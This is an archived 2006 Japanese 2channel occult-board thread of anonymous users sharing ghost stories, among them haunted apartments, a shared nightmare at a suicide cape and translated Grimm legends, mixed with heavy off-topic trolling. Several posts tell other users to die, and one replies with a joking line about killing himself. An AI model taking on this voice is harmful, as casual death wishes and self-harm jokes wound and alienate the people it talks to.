241 :本当にあった怖い名無し:2006/10/07(土) 05:08:00 ID:HQ6IBH3R0
>>237
日本屋だと!?オーナーは売国奴か!!

242 :本当にあった怖い名無し:2006/10/07(土) 05:52:23 ID:3zBTXW230
型にはまったような話とか、パーツを寄せ集めたような話って、荒らしとあまり変わらないよね。

243 :本当にあった怖い名無し:2006/10/07(土) 07:12:30 ID:aDXp7JVwO
ダメ!!絶対!!

244 :本当にあった怖い名無し:2006/10/07(土) 07:14:04 ID:Pdl6dlpIO
色んなタイプの霊の事をあまりよく分からない人は
●髪の長い…とか
●爪の長い…っていうのは
( ・∀・)
悪い意味アイでの要注意の1つの兆候(サイン)だと思っていいと思いまつよ。

もちろん、生前から髪が長かったという場合もあるでしょうが
強い怨念系や物凄く苦しい思いをして亡くなった方の御霊(ミタマ)に遭遇した場合等によくある
●髪が長いとか、身体に巻き付くような…とかいう事はままよくある話で
髪が絡んでくるような長さにまでのびたりするみたいな事もあるらしいでつよ。

怨念等で髪が長くなった場合は、大体は爪も長かったりします。

ひどい霊現象に悩まされる場所等は
どんなに毎日掃除をしても、長い髪の毛が床に降って来たり…なんて事もよくあるくらい

だそうでつ。

強い怨念に引き寄せられ、沢山の似た霊や蛇などの動物霊も手伝って
強力な魔になった御霊も我々の世界にゴロゴロあるかと思いまつ。

決して興味ホンイで近付かぬよう、気を付けられた方が良いと思いまつよ。

という訳で、スレチスマソ。

245 :本当にあった怖い名無し:2006/10/07(土) 07:57:10 ID:aDXp7JVwO
やっとリンカとシェイラの区別がつけられるようになりまんた

246 :毛虫:2006/10/07(土) 10:42:43 ID:aDXp7JVwO
毛虫ってさ〜気持ち悪いよね〜
毛虫ってさ〜存在価値ないよね〜
毛虫殺しても地獄に落ちないよね〜
毛虫をふんずけてさ〜
ぷっしゃーって飛び出た緑の血が気持ち悪いよね〜
毛虫の中ってどうなってんだろ〜
興味わいてきた…
庭に行って探してみよ〜
おっきな毛虫がとれたよ〜
転がしてみよ〜ごろごろごろプチッ
あっちゃ〜やっちった
さっそくフォークでじゅしゃって刺してみたよ〜
くねくねくねってしてる〜
まだ生きてるの〜
ナイフで半分に切って中をよく見てみよ〜
にちゅーぬっちゃぬっちゅぷぷちゅぷちゅー…
へ〜こうなってるんだ〜
思ってたより気持ち悪くないよ〜
興味津々なぼくは緑の液をなめたよ〜
………うぇ
…………

!!??
何やってんだ俺…
うわぁぁああーーっっ!!!!
なんだコレは!!!
うギャーーーーーー!ぎょーーーー!!
ぎょぎょきーーー!!
ハァ…ハァ…ハァ…へへ…へへへ
晩御飯買って来ないと…面倒くさいな…
これでいいや〜

247 :本当にあった怖い名無し:2006/10/07(土) 11:04:52 ID:pfMMHLfmO
>>153
別に1001なんてvipじゃ奇跡どころか珍しくもないだろ
1006くらいまで行った事もあった筈だし
素人はこれだから困る

248 :本当にあった怖い名無し:2006/10/07(土) 12:15:03 ID:yQK0Tjna0
ジブリ実況とかじゃ1030とかいくよ


249 :本当にあった怖い名無し:2006/10/07(土) 12:21:05 ID:aDXp7JVwO
アイカゴ実況じゃ9000は軽く超えてみせる

250 :本当にあった怖い名無し:2006/10/07(土) 15:40:39 ID:grli+RHMO
>>215
続き待ってるぞ〜


251 :本当にあった怖い名無し:2006/10/07(土) 16:22:59 ID:jcRnn3hW0
「続きはまた今度」とか「他にもあるけどまた今度」なんていう奴の話が怖かったためしは無いな。

252 :本当にあった怖い名無し:2006/10/07(土) 16:41:55 ID:xQE/dso10
けっこう前に団地に住んでいた時、
ベランダにハサミが置かれていた事があった。
もちろん俺のではない。柄が赤い色をしたハサミ。
市販で売ってるような小さいやつね。

自分の家は一階だったから、
ガキがイタズラしてるのか、ぐらいにしか考えなかった。
それが10回ぐらい続いた。

その日もハサミが置いてあるのが部屋から見えた。
見ていたテレビが後もう少しで終わりそうだったので、
それが終わってから、いつものように捨てようと思った。

やがてテレビが終わり(5分ぐらい)、
ベランダを見るとハサミが無い。

253 :本当にあった怖い名無し:2006/10/07(土) 16:42:41 ID:xQE/dso10
ベランダの戸は開けて網戸にしておいたから、
テレビを見ているとは言え、誰か来たらすぐに分かる。

あれっ、と思ってベランダに出た時。
非常の際に隣りの壁を破って脱出できる、
薄い壁みたいなのがベランダにはあるでしょう?
あれを。
向こうから思いっきり叩く音がした。

うおっ、とのけぞったら、上の隙間から、
赤い柄のハサミが7,8個一気に降ってきた。
のけぞってなかったら結構危なかった。

確実に、壁一枚隔てた所から、無言で、ハサミを投げ入れていた。

そういえば隣人を全くと言っていいほど見なかった。
居る、ということは物音などで知っていたけど・・・。
だから恨みを買われるような事はしていない。

それから一年ぐらい同じ場所に住んでたけど、
こんな事があったのは後にも先にもこの時だけ。
だから、逆に意味不明で怖かったです・・・。

254 :本当にあった怖い名無し:2006/10/07(土) 16:45:10 ID:K5DI1jQA0
>>252-253

体験した本人にしかわからぬ恐怖ですな。
自分はそんな体験は願い下げですな。
一年と持たず引っ越す。

255 :本当にあった怖い名無し:2006/10/07(土) 16:49:26 ID:9iMvdkge0
俺ならハサミを売って小遣い稼ぎ

256 :本当にあった怖い名無し:2006/10/07(土) 18:14:30 ID:aDXp7JVwO
ハサミって何か怖くない?
あれ作った人かなりの…
かなりの…

257 :本当にあった怖い名無し:2006/10/07(土) 18:40:10 ID:k473D0DG0
ファンタジスタですよね

258 :本当にあった怖い名無し:2006/10/07(土) 18:42:42 ID:+OSutnDq0
>>256
かなりのなんだ!?
かなりのなんだ!?
かなりのなんだ!?


259 :本当にあった怖い名無し:2006/10/07(土) 18:43:21 ID:+OSutnDq0
 か り な の だ ん な !?


260 :本当にあった怖い名無し:2006/10/07(土) 20:05:28 ID:aDXp7JVwO
すいません、書くの忘れてました。
天才ですね

261 ::2006/10/07(土) 20:46:05 ID:+OSutnDq0
アイカゴ…なぜ私に振り向いてくれないんだ!
アイカゴにたいしてこんなにも真剣に考えているのに…
あー無情…かなしき青春!!
これからどうやって生きていけばいいのだ…これじゃまるで生き地獄だよ…
あー…アイカゴよ
アイカゴ…アイカゴ、アイカゴよ…
この思いよ頼むから届いておくれよ…

262 :????:2006/10/07(土) 21:05:03 ID:aDXp7JVwO
>>291
激しねや!!

263 :本当にあった怖い名無し:2006/10/07(土) 21:14:03 ID:aDXp7JVwO
>>262間違いた…ω
激しねや!!

264 :本当にあった怖い名無し:2006/10/07(土) 21:14:54 ID:+OSutnDq0
>>293
じゃかわしぃわぃ!!

265 :ア??ゴ:2006/10/07(土) 21:15:32 ID:aDXp7JVwO
>>261
激しねや!!

266 :ア1カゴ:2006/10/07(土) 21:16:58 ID:aDXp7JVwO
激ごめんね…ф

267 :ア1カゴ:2006/10/07(土) 21:18:21 ID:aDXp7JVwO
>>264
激シンディ

268 ::2006/10/07(土) 21:22:46 ID:+OSutnDq0
このスレ更新するたびにウイルス反応するので卒業します。
さようならアイカゴ
ありがとうアイカゴ

269 :本当にあった怖い名無し:2006/10/07(土) 21:23:56 ID:hUvKrGIM0
>>291
イ`

270 :本当にあった怖い名無し:2006/10/07(土) 21:24:13 ID:k473D0DG0
>>291
マダー

271 ::2006/10/07(土) 21:27:35 ID:+OSutnDq0
読み込みなおしたら直った
アイカゴしねや!!

272 :ア1カゴ:2006/10/07(土) 21:31:49 ID:aDXp7JVwO
ぐはーっ……

273 :本当にあった怖い名無し:2006/10/07(土) 21:47:46 ID:aDXp7JVwO
ねぇ真面目なんだよ。

274 ::2006/10/07(土) 21:52:50 ID:+OSutnDq0
ア1カゴってなんやねーん♪
なんやねーん♪
なんやねーん♪
じゃかわしぃわぃ!!

275 :本当にあった怖い名無し:2006/10/07(土) 21:58:22 ID:aDXp7JVwO
実は俺本物じゃないんだけど、本物ってどんな奴なの?
誰か教えてください。

276 :本当にあった怖い名無し:2006/10/07(土) 22:02:02 ID:hUvKrGIM0
また携帯とPCでの自演が始まってたのか・・・
NG推奨
ID:aDXp7JVwO
ID:+OSutnDq0

277 :本当にあった怖い名無し:2006/10/07(土) 22:10:12 ID:aDXp7JVwO
>>276
おとうさん…ф

278 :本当にあった怖い名無し:2006/10/07(土) 22:52:06 ID:+OSutnDq0
激と超が同じ人だってさw
超どう思う?

279 :本当にあった怖い名無し:2006/10/07(土) 23:00:47 ID:aDXp7JVwO
>>278
荒らし帰れよ!!

280 :本当にあった怖い名無し:2006/10/07(土) 23:36:36 ID:+OSutnDq0
>>279
ごめんよ( ´・ω・`)
俺のためにみんなが迷惑してるんだね・・・
みんなしねばいいのに・・・

281 :本当にあった怖い名無し:2006/10/07(土) 23:46:27 ID:YajIO3Ko0
しねばいいと思ぉ〜^▽^)ノ

282 :本当にあった怖い名無し:2006/10/07(土) 23:50:55 ID:Ac2Fk4Ex0
上げてみるか・・・



283 :本当にあった怖い名無し:2006/10/08(日) 00:02:17 ID:aDXp7JVwO
じゃ俺も死のう…

284 :本当にあった怖い名無し:2006/10/08(日) 01:18:21 ID:o7RrnL1l0
死ねとかイ`とか物騒な話はやめて怖い話を書き込もうYO!!!

285 :本当にあった怖い名無し:2006/10/08(日) 01:18:59 ID:L4L5qHwTO
ギャルに纏わる恐い話の続きマダー?

286 :本当にあった怖い名無し:2006/10/08(日) 01:25:36 ID:BBpKVm9Q0
もうこのスレ、1年は要らんようなw

287 :本当にあった怖い名無し:2006/10/08(日) 01:30:01 ID:I/G2HUOTO
http://090ver.jp/~usoriro/

自分の部屋で携帯からここ見るといつもボソボソと話声みたいなのがどこからか聞こえてくるんだが…
隣と上の部屋は空いてるのに…
ガク(((゚Д゚;)))ブル
PCで見てもなんにもないのに
('A`)ナンダコレ

288 :本当にあった怖い名無し:2006/10/08(日) 01:30:04 ID:Y4gVZIN/0
特に霊感がある訳でもなく、あまり生々しい話ではないですが…。

4年程前のまだ夏と呼ぶには肌寒い頃、
当時「2人で朝日を見る」というシュチェーションに憧れていて、
あまり乗り気ではない彼女と一緒に、
当時住んでいた地方都市から車で3時間位の岬にドライブした。

駐車場に到着したのが、4時頃だっただろうか。他に車が数台。
まだ辺りは真っ暗で、Iモードの天気予報では日の出まであと1時間近くあった。

「外は寒いし眠い」と機嫌が悪い彼女を車内に残し、
ワクワクしていた俺だけが朝日スポットを探しに岬へ向かい散歩した。
「何だか、嫌〜な空気」を感じてそそくさと車へ戻ると彼女は助手席で爆睡。

289 :本当にあった怖い名無し:2006/10/08(日) 01:33:24 ID:Y4gVZIN/0
仕方なく運転席のシートを倒して眠った。
結局2時間以上眠ってしまったと思う。もう朝日が登っていた。

夢を見た。
詳細は覚えていないが、赤いコートを着た男が登場したことと、
とても後味が悪かったことは、目を覚ましてからもおぼろげに記憶にあった。

ほぼ同時に起きた彼女が、真っ先に言った言葉が、
「すっごく怖い夢を見た。赤いコートを着た知らない男の人が、車の窓を叩いて…」

「うわーっ、それ以上言うなっ! 帰るぞっ!」と、遮って車を発進。
市街地に降りてから、似たような夢を見たことと、怖いから詳しい夢の話は止めよう。
と、話して帰路に着いた。

後で、地元出身の友人に、そこが自殺の名所であることを聞いた。
それ以来、気味が悪く、その岬には行こうと思わない。

290 :本当にあった怖い名無し:2006/10/08(日) 01:36:44 ID:Z8DbaJMgO
「おい!起きろ!」
俺は必死に彼女を起こした…
彼女は死んでいたのだ…
それいらい夕日を見るのが怖くて仕方ありません。

291 :本当にあった怖い名無し:2006/10/08(日) 01:37:52 ID:7dw6w4Xo0
夜中の浜辺を歩いたことがあるが
あんなところ10分もぼーっとしながら歩いてたら
慣れてる奴以外は何か見ないほうがおかしいと想うぜ

292 :本当にあった怖い名無し:2006/10/08(日) 02:00:36 ID:7frHeCFa0
>>291
何が見えるの?

293 :本当にあった怖い名無し:2006/10/08(日) 04:11:16 ID:f8FyxwtR0
ダッシャってなんだっけ?

294 :本当にあった怖い名無し:2006/10/08(日) 04:17:11 ID:Z8DbaJMgO
>>293
猪木の口癖でないかと

295 :本当にあった怖い名無し:2006/10/08(日) 09:35:45 ID:fZ5Bkix00
1年前、俺が大学生で平凡なマンションで一人暮らしをしていたときの話。
冬のある日の深夜のでき事。

近所の犬の鳴き声で目が覚めてしまった。
それが昼間聞く鳴き声と違ったので、
タバコを買いにコンビニに行くついでに様子を見ようと外へ出ました。
そのとき部屋に鍵を閉めてでれば、こんな事は起こらずにすんだのですが・・・


296 :295:2006/10/08(日) 09:45:29 ID:fZ5Bkix00
犬はマンションの向かいの家で飼われていて、
僕が外に出たときにはすでに落ち着いていました。

僕はいつものようにコンビニでタバコとピルクルを買って帰りました。
部屋につくて、タバコを吸いながらパソコンをしていると
トイレから水が流れる音がしました。
この時点で僕は特に焦りはしませんでした。
彼女がよく、黙って僕の部屋に入り込んでいるのは日常茶飯事だったので
このときもまた彼女がコンビニに行っている間に家に来たんだと思いました。

それから30分くらいかな?
出てくるのが遅かったので、トイレに向かって聞きました。
「どうした?おなかいたいの?」



297 :295:2006/10/08(日) 09:52:12 ID:fZ5Bkix00
返事が無かったのでトイレのドアをノックしたが返事はなく、
しかも鍵が開いていたので、ドアを開けました。

しかし、中には誰もいませんでした。

その瞬間、今度は玄関のドアが2.3CMぐらいかな?
ほんの少し開いて閉じました。
不思議に思った僕は玄関を開けて廊下を見たけど誰もいませんでした。

?になってた僕は、まぁいいか。と再びパソコンをやりはじめました。

そしたら、また例の犬が異常なほど吠えはじめました。

298 :295:2006/10/08(日) 09:56:16 ID:fZ5Bkix00
それから僕が大学を卒業するまでの数ヶ月間
時々深夜に犬が吠え始めたかと思うと、
トイレが流れる音が聞こえるようになりました。

奇妙でしたが、特に害は無かったので気にしませんでした。

おととい起きた事件までは。

299 :本当にあった怖い名無し:2006/10/08(日) 10:04:03 ID:PfId+luT0
>>300
チーズあられ取ってぇ

300 :本当にあった怖い名無し:2006/10/08(日) 10:10:32 ID:GO4pGtqMO
わりぃきらしてる

301 :295:2006/10/08(日) 10:16:00 ID:fZ5Bkix00
その部屋を僕の後輩が引き続いて貸りていたのですが。
おとといの夜、例の犬の鳴き声と同時にそのトイレに入っていたらしんです。
そいつから深夜電話がかかってきて

後輩「○○(俺の名前)さん!でましたよ!!!」
俺 「おへ!?マジで?トイレの?大丈夫か?」
後輩「犬の鳴き声がしたかと思うと、
   『俺のトイレだ!』って声がしてトイレの水が流れた!!」

僕は「おお」と思いながら、やはり霊的なモノだったんだなと確信。
友人も電話の向こうではぴんぴんしてるし、そんなに危険なモノじゃないだろう。

そして昨日、もう少し詳しく聞こうと会社帰りにその後輩の家に遊びに行った。
電話をかけても部屋をノックしても誰も出てこなかったので、
鍵がかかってなかったので勝手に中にで待ってる事にした。(結構仲がよい)

302 :295:2006/10/08(日) 10:19:44 ID:fZ5Bkix00
するとトイレのドアが開いていて、トイレの流れる音が聞こえる。
もしや!?と思い、トイレに行くとそこには

とても小さくなった後輩がいた。
それはシルバニアファミリーぐらいの小ささだった。

とても珍しいのでもって帰り、水槽で飼うことにしました。

303 :本当にあった怖い名無し:2006/10/08(日) 10:48:18 ID:ZRyZXepo0
ちゃんとシルバニアファミリーの家を買ってやれよ

304 :本当にあった怖い名無し:2006/10/08(日) 10:51:29 ID:NipeFzVGO
>>302
ネタ切れ?

305 :本当にあった怖い名無し:2006/10/08(日) 11:54:09 ID:Z8DbaJMgO
黒木メイサ!!
メイサ!!
メイサ!
メイサ…
メイサ???
メイサ??
メイサ?
めいさ?
めぅいすぁあ?

306 :295:2006/10/08(日) 12:49:53 ID:A42t8n1m0
それで僕はドアが開いて閉じたときに、その後を追いかけて外に出てみることにしたのです。
すると近所のプールつきの豪邸で、若い男女と初老の男性が言い争っている姿を目撃しました。

若い男女は「こんなに大事になるとは思っていませんでした、きっとうまくいくと思っていたんです!
事情を隠していてほんとに申し訳ありません・・」といっていました。
初老の男性は「君達にまかせていたのが間違いだったな、私はすぐに将軍に連絡せねばならん、
君達はさっさと研究所に戻って、身の回りの整理をしておくことだな。」といいました。

その後、ひとりになった初老の男性がプールのそばでパイプをくゆらせていると、
まるで誰かに突き飛ばされたかのように、プールの水に飛び込んだのです。


307 :295:2006/10/08(日) 12:58:15 ID:fZ5Bkix00
ジャーゴボゴボ
初老の男性がプールに飛び込んだ音は確かにそう聞こえました。
ここのプールと元私の部屋のトイレは繋がっている!?

私が知っているのはココまでです。
皆さんの知っている情報があれば何でも結構です。
場所は日光江戸紫です。
よろしくおねがいします。

308 :マルキン:2006/10/08(日) 13:08:07 ID:Z8DbaJMgO
プーさんって設定上ぬいぐるみなんだね。
怖いよね…。

309 :本当にあった怖い名無し:2006/10/08(日) 15:19:18 ID:pgf/23PqO
ハチミツは中で染み込むのかな、怖いよね。

310 :本当にあった怖い名無し:2006/10/08(日) 15:50:34 ID:Z8DbaJMgO
え?プーさんってはちみつ食べるの?
知らなかった…
今年一番の洒落にならない怖い話だ…あわわ

311 :本当にあった怖い名無し:2006/10/08(日) 16:04:02 ID:dAHDrR8t0
なんでここにはいたい奴しか集まらんのだ?
え? おれ? おれもかorz

312 :本当にあった怖い名無し:2006/10/08(日) 16:29:29 ID:Z8DbaJMgO
>>311
ナカーマんすーぷれっくす

313 :本当にあった怖い名無し:2006/10/08(日) 16:37:47 ID:dAHDrR8t0
仲間にしないでくれよorz


314 :本当にあった怖い名無し:2006/10/08(日) 16:45:01 ID:Z8DbaJMgO
>>313
(´〜`;)じゃなんなんだよチミは?
ワガママだよー…

315 :本当にあった怖い名無し:2006/10/08(日) 17:02:28 ID:dAHDrR8t0
    _, ,_  パーン
 ( ‘д‘)
  ⊂彡☆))Д´) >>314

316 :本当にあった怖い名無し:2006/10/08(日) 17:12:21 ID:Z8DbaJMgO
>>315
(ρ_―)
親父にも(ry

317 :本当にあった怖い名無し:2006/10/08(日) 17:20:32 ID:Ry14aNP5O
それがあまっ(ry

318 :本当にあった怖い名無し:2006/10/08(日) 17:24:03 ID:0323S3mN0
昨日を起きた出来事を書きます。

昨日は今日が休日ということもあり、少し遅めに寝ました。
しばらくすると寝ているはずなのに意識があるという
不思議な感じになりました。

そしてそんな状態が続いていると部屋でおかしな音が
鳴り始めました。
最初は気のせいだと思い、目を閉じてました。
すると今度は金縛りにあいました。

金縛りにあったのは、初めてでとにかく苦しくて
恐怖で早く開放されることを願いました。
金縛りから開放されたので、寝返りをうつと
部屋に何かいました。

319 :本当にあった怖い名無し:2006/10/08(日) 17:25:57 ID:0323S3mN0
そしてそれはすぐに人でないことがわかりました。
そこにあったそれは、人形のようなものでした。
しかしその大きさは人間の大きさくらいもありました。
明らかに太い胴体に長い髪の毛が乗ってるという感じです。
顔は確認できないというよりとにかく胴体に髪の毛が
覆いかぶさってる物体のでした。

しかしその物体は、こちらを見ているわけでなく
部屋の入り口の方を見ていました。
もうとにかく恐ろしいので、目を閉じて朝が来るのを待ちました。
私が目を閉じている間も部屋では、ずっと変な音がしてました。
気がつくと朝になっていました。
こんな恐ろしい経験をしたのは初めてなので今日寝るのが恐ろしいです。


320 :坂井泉:2006/10/08(日) 17:44:39 ID:Z8DbaJMgO
負けないでーもう少し最後まで走り抜けてーって日テレの歌みたいになっちった…やだなー…
せっかくいい歌なのに…

321 :本当にあった怖い名無し:2006/10/08(日) 17:46:36 ID:rlY1FSkQ0
僕は西岡です。
もっともみんなは僕のことを西村といいます。
全部あなたのしわざです。
あれ以外は、あなたのしわざです。
あしたからもやります。
一日飛ばしでやります。

322 :本当にあった怖い名無し:2006/10/08(日) 18:24:18 ID:iRouhdp50
>>295
タバコとピルクルは最高〜の組み合わせですね 
俺以外に、この組み合わせが居るとは思わなかった 

323 :本当にあった怖い名無し:2006/10/08(日) 18:42:30 ID:Z8DbaJMgO
同意
俺もピルクル飲んでる
べ、別にしょこたんの真似してる訳じゃないお
煙草はマルキンでっしゅ!

324 :本当にあった怖い名無し:2006/10/08(日) 19:15:39 ID:rlY1FSkQ0
下半身まるだしのプーさんが怖い

325 :本当にあった怖い名無し:2006/10/08(日) 19:23:43 ID:dAHDrR8t0
なんでいたいやつばっかwwww

326 :本当にあった怖い名無し:2006/10/08(日) 19:25:02 ID:rlY1FSkQ0
ナンノのものまねはマシューの方がうまいな

327 :本当にあった怖い名無し:2006/10/08(日) 20:04:40 ID:Z8DbaJMgO
みんな!!これ以上荒らすなよ!!ぜっっったいに荒らすなよ!!絶対だぞ、絶対!!

328 :本当にあった怖い名無し:2006/10/08(日) 20:16:16 ID:dAHDrR8t0
   _, ,_  パーン
 ( ‘д‘)
  ⊂彡☆))Д´) >>327

329 :本当にあった怖い名無し:2006/10/08(日) 20:20:59 ID:rlY1FSkQ0
さすが山ちゃん面白すぎ

330 :本当にあった怖い名無し:2006/10/08(日) 20:45:51 ID:Z8DbaJMgO
さんさんさん爽やか三組〜?

331 :本当にあった怖い名無し:2006/10/08(日) 20:49:51 ID:rlY1FSkQ0
>>330
えっ!!どういうこと!?
君も3組ってこと!?
kwsk!!!!!

332 :本当にあった怖い名無し:2006/10/08(日) 21:17:51 ID:Z8DbaJMgO
LEE30倍に中に付いてるパウダーを全部入れて食べたら胃がやられたんだけど、お前らのせいか?

333 :本当にあった怖い名無し:2006/10/08(日) 21:19:44 ID:rlY1FSkQ0
>>332
ごめんね( ´・ω・`)

334 :本当にあった怖い名無し:2006/10/08(日) 21:21:20 ID:dAHDrR8t0
_, ,_  shine!
 ( ‘д‘)
  ⊂彡☆))Д´) >>332

335 :本当にあった怖い名無し:2006/10/08(日) 21:21:37 ID:Z8DbaJMgO
>>300
チーズアラレうまいよね〜
探すのに一苦労だよ

336 :本当にあった怖い名無し:2006/10/08(日) 21:34:10 ID:w7mhb9FV0
心霊スポットで撮った画像です。
何か見えますか?
http://image.blog.livedoor.jp/blog_ch/imgs/a/3/a346cb6c.gif


337 :本当にあった怖い名無し:2006/10/08(日) 22:11:56 ID:VXnCh20L0
今映画「あずみ」を観ながらこのスレ読んでたんだけど
テレビのほうから小さな女の子がクスクスって笑うのが聞こえた。
え?って思ってテレビみたけど、そのとき女の子が笑うようなシーンじゃなかったからちょっとゾクってきた。

こういう場合ってもう読まないほうがよさげ?

338 :本当にあった怖い名無し:2006/10/08(日) 22:33:25 ID:c3bQbIw40
>>336 もう飽きた

339 :本当にあった怖い名無し:2006/10/08(日) 23:02:14 ID:Z8DbaJMgO
>>337
違う怖いサイトだけど、見ながらテレビ付けてたらテレビから女の人の声がきこえた体験したこと俺もあるよ。
深夜の内山くんがやってるパチンコの番組なんだけど、携帯の怖いサイトみてたら、テレビから「あけて あけて ありがとう」って生気のない声がしたから、テレビみたら(声がした時は怖かったから2分後ぐらいにみた)そんな場面ないし…ってか声の主がいなかった。
深夜だからすごい怖かったよ

340 :本当にあった怖い名無し:2006/10/08(日) 23:04:28 ID:rlY1FSkQ0
>>339
気のせい気のせい
俺なんか一日中髪の長い女の人に抱きつかれてるよ

341 :本当にあった怖い名無し:2006/10/08(日) 23:05:44 ID:QPWhn2OBO
俺が中学生の頃、家族と車で日光にいった。
東照宮に近い栄えてる町の道で信号待ちをしていると、後ろの座席に座った俺はふと、横の窓から外を見た。
その道は観光地に近いこともあって、両側は小さい店なんかでうまっていたが、車のすぐ横の建物は普通の民家のようだった。
すると、玄関が少し開いていて、そこには3人の人が見えた。でもそれは人ではなかった。
よくみると、服を着たマネキンのようだった。俺は怖くなって目をそらすと、信号が青になって車は進んでいった。

その後もマネキンが頭からはなれず、帰り道で通った時は、走っていたのでよく見えなかったが、マネキンはいなくなっていた。

なぜ玄関にマネキンがいたのか、後から考えるととても不思議だ。

342 :本当にあった怖い名無し:2006/10/08(日) 23:11:11 ID:Z8DbaJMgO
>>340
荒らしは死ねよ

343 :本当にあった怖い名無し:2006/10/08(日) 23:13:18 ID:Z8DbaJMgO
>>341
こういう話好きだー
またマネキンっていうのが不気味ですね
想像したら夢に出てきそうで怖いです

344 :本当にあった怖い名無し:2006/10/08(日) 23:15:42 ID:rlY1FSkQ0
>>342
なんでそんなこと言うん( ´・ω・`)

345 :本当にあった怖い名無し:2006/10/09(月) 00:00:37 ID:rlY1FSkQ0
さて、荒らしもいなくなったところで俺が怖い話でもしていいかか?

346 :本当にあった怖い名無し:2006/10/09(月) 00:01:06 ID:rlY1FSkQ0
ちょwwwID変わってないwwwwwwwwwwwwwwww

347 :アイカゴ:2006/10/09(月) 00:10:11 ID:VKS7xhWh0
>>344
吹いたw
荒らしの癖におもろいな

348 :本当にあった怖い名無し:2006/10/09(月) 00:11:02 ID:j9Ab/YnSO
>>345
いいかかってなに?

349 :アイカゴ:2006/10/09(月) 00:13:24 ID:j9Ab/YnSO
はにゃはにゃぐ〜(ω)

350 :322:2006/10/09(月) 00:16:23 ID:GmwY8NoQ0
>>323
オラはマルメンだ! 同士YO

351 :本当にあった怖い名無し:2006/10/09(月) 00:24:06 ID:j9Ab/YnSO
>>350
YO〜おめぇもマルボロかYO〜
メンソは要注意だぞ〜
インポだけにインポッシブルになっちまうぜ〜

352 :ユリ:2006/10/09(月) 00:54:43 ID:iUgN6Ndz0
たまには欧州ものでもどうぞ。グリムの「ドイツ伝説集」より抜粋。

《ビンゲンの鼠塔》
ビンゲンに近いところのライン川の真ん中に高い塔が聳えている。
この塔については次のような話が広く語り伝えられている。
974年ドイツは大飢饉に見舞われ、人々はやむをえず犬や猫を食べ、
それでも多くの人々が飢えのために死んでいった。
さて当時マインツにハトー二世と呼ばれる司教がいた。
この司教はけちで自分の財産をふやすことしか頭になかった。
貧しい人々が横町で倒れ、また群れをなしてパン屋のパン置き台に殺到し、
力ずくでパンを奪っていても、それを傍目で見ていた。
憐憫の情はこの司教の心には芽生えず、
「貧しいものをすべて待ちの前の納屋に集めよ。そのものたちに食事を与えよう」
といった。
そして貧しい人々が納屋の中に入ってしまうと、戸に錠を下ろし火をかけ、
その人々を納屋もろとも焼き殺してしまった。
その中には老いも若きも、男も女もいた。
司教ハトーは、燃えさかる炎の中で人々が呻き、悶えるのを聞き、
「聞け、聞け、鼠が鳴いているぞ」とあざ笑った。
しかし主なる神は、間もなくこの者を懲らしめなされたのである。
司教のもとに、どこからともなく鼠が現れるようになった。
鼠は昼となく夜となく司教の身体の上を走って噛み付き、
どんなに力を尽くしても司教はこの鼠たちから身を守ることが出来なくなった。
とうとう最後に思いついた策は、
ビンゲンのそばのライン川の真ん中に塔を建てることであった。
この塔は今日でも見られるが、
司教はここでなんとか生きながらえていこうと考えたのであった。
しかし鼠は流れを横切って泳ぎ寄せ、塔に這い登り、
司教を生きたまま食い尽くしてしまった。


353 :ユリ:2006/10/09(月) 00:55:27 ID:iUgN6Ndz0
《少年の湿地》
グロースビーバーアウの入会地にはユーバーラウに向かって谷が伸びている。
人々はこの谷を「少年の湿地」と呼び、
夜間にそこを通るといつもぞっとして鳥肌が立つという。
昔この国が戦争と飢餓に見舞われた折のこと、
二人の貧しい少年がユーバーラウから戻ってきた。
二人はいつも仲がよく、もらってきた施し物をこの谷で分け合うのを常としていた。
この日は二、三ペニヒしか手に入れることが出来なかったが、
一人の少年は金持ちの村長から友達と分けられるようにと、
施しのパンをひとかたまり恵んでもらっていた。
さてほかのものは全て公平に分けられ、少年が例のパンをポケットから取りだしたとき、
そのパンがとても芳しく匂ったものだから、
相手の少年はこれを自分で独り占めにしたいという誘惑に駆られてしまった。
二人の仲はそこで終わり口論を始め、言葉の争いからつかみ合いになり、
とうとうどちらからともなく二人は柵から杭を抜き取った。
悪魔が杭を持った二人の手を導き、どちらともなく相手を殴り殺してしまった。
この殺人からあと三日というもの、この湿地では葉のひとひらも動くことなく、
一羽の鳥も歌うことがなかった。
それ以来この湿地は無気味で、少年たちのすすり泣く声が聞かれるのである。


354 :ユリ:2006/10/09(月) 00:58:29 ID:iUgN6Ndz0
《罪深い愛》
エアフルト近郊のペータースベルク山の上には、兄と妹を一つに埋葬した墓があり、
そのいくらか高めの墓石に二人の姿が彫られている。
兄がしばらく異国で暮らし、再び国に戻ってきたとき、
妹はとても美しい乙女へと成長していた。
二人はお互い激しい思いを抱くようになり、罪深い関係に陥ってしまった。
しかし悪魔がどこからともなく現れ、二人の首を引きちぎった。
墓石に二人の像が彫られたが、ここでもまた頭部が取れて消えてしまい、
頭部を固定していた留め金だけが後に残された。
真鍮製の頭を乗せてみたが、これもどこかへ行ってしまった。
それどころかチョークでその上に顔を描いても、
翌日には跡形もなく拭い消されてしまっていた。

355 :本当にあった怖い名無し:2006/10/09(月) 01:00:17 ID:VWbpVA9i0
        ., -、,. -─- 、⌒〉
         {  }      ヽ_    r'⌒)
         ヽ、  ,,-‐‐  ‐‐-、  iヽ、 J
         {   、_(o)_,: _(o)_ヽ/ ヽ/∪
           !       >::  }  /    
          l    /( [三] )ヽノ‐''>  < うわぁぁぁああああ!はちみつかと思ったらホンタクの壷だった!
        i⊂}__   `二´‐'´__/__
        ヽ   ‐- 、二`ヽ/〉⊂ニニ⊃)
         |    // ̄ ̄)j~U^∪ヽ
         ノ ` ‐-L!--‐''(´      )
        `i''ー----‐ ''"´ ヽ、__/
         !           }  ` }
          !.  , -‐- 、.    ノ--─ '
          ヽ、_{.     `ヽi'⌒i
           `''‐- 、.. __,!


356 :本当にあった怖い名無し:2006/10/09(月) 01:33:39 ID:SPnlETpd0
>>355
ワロタ


357 :322:2006/10/09(月) 01:36:07 ID:GmwY8NoQ0
>>351
YO〜兄弟! オラの息子の事まで心配して貰って
オメーこそ吸い過ぎには注意しろYO


358 :本当にあった怖い名無し:2006/10/09(月) 01:52:17 ID:6WYI+wla0
おいらもマルメンだったけど禁煙して一年経ったよ

359 :本当にあった怖い名無し:2006/10/09(月) 02:25:07 ID:6WYI+wla0
アイカゴ…
ギギギ…
ブリュブリュ…ピー…

360 :本当にあった怖い名無し:2006/10/09(月) 03:18:24 ID:6WYI+wla0
ズリュッ…ズリュッ…ズリュッ…
ズリュッ…ズリュッ…
ズリュッ…

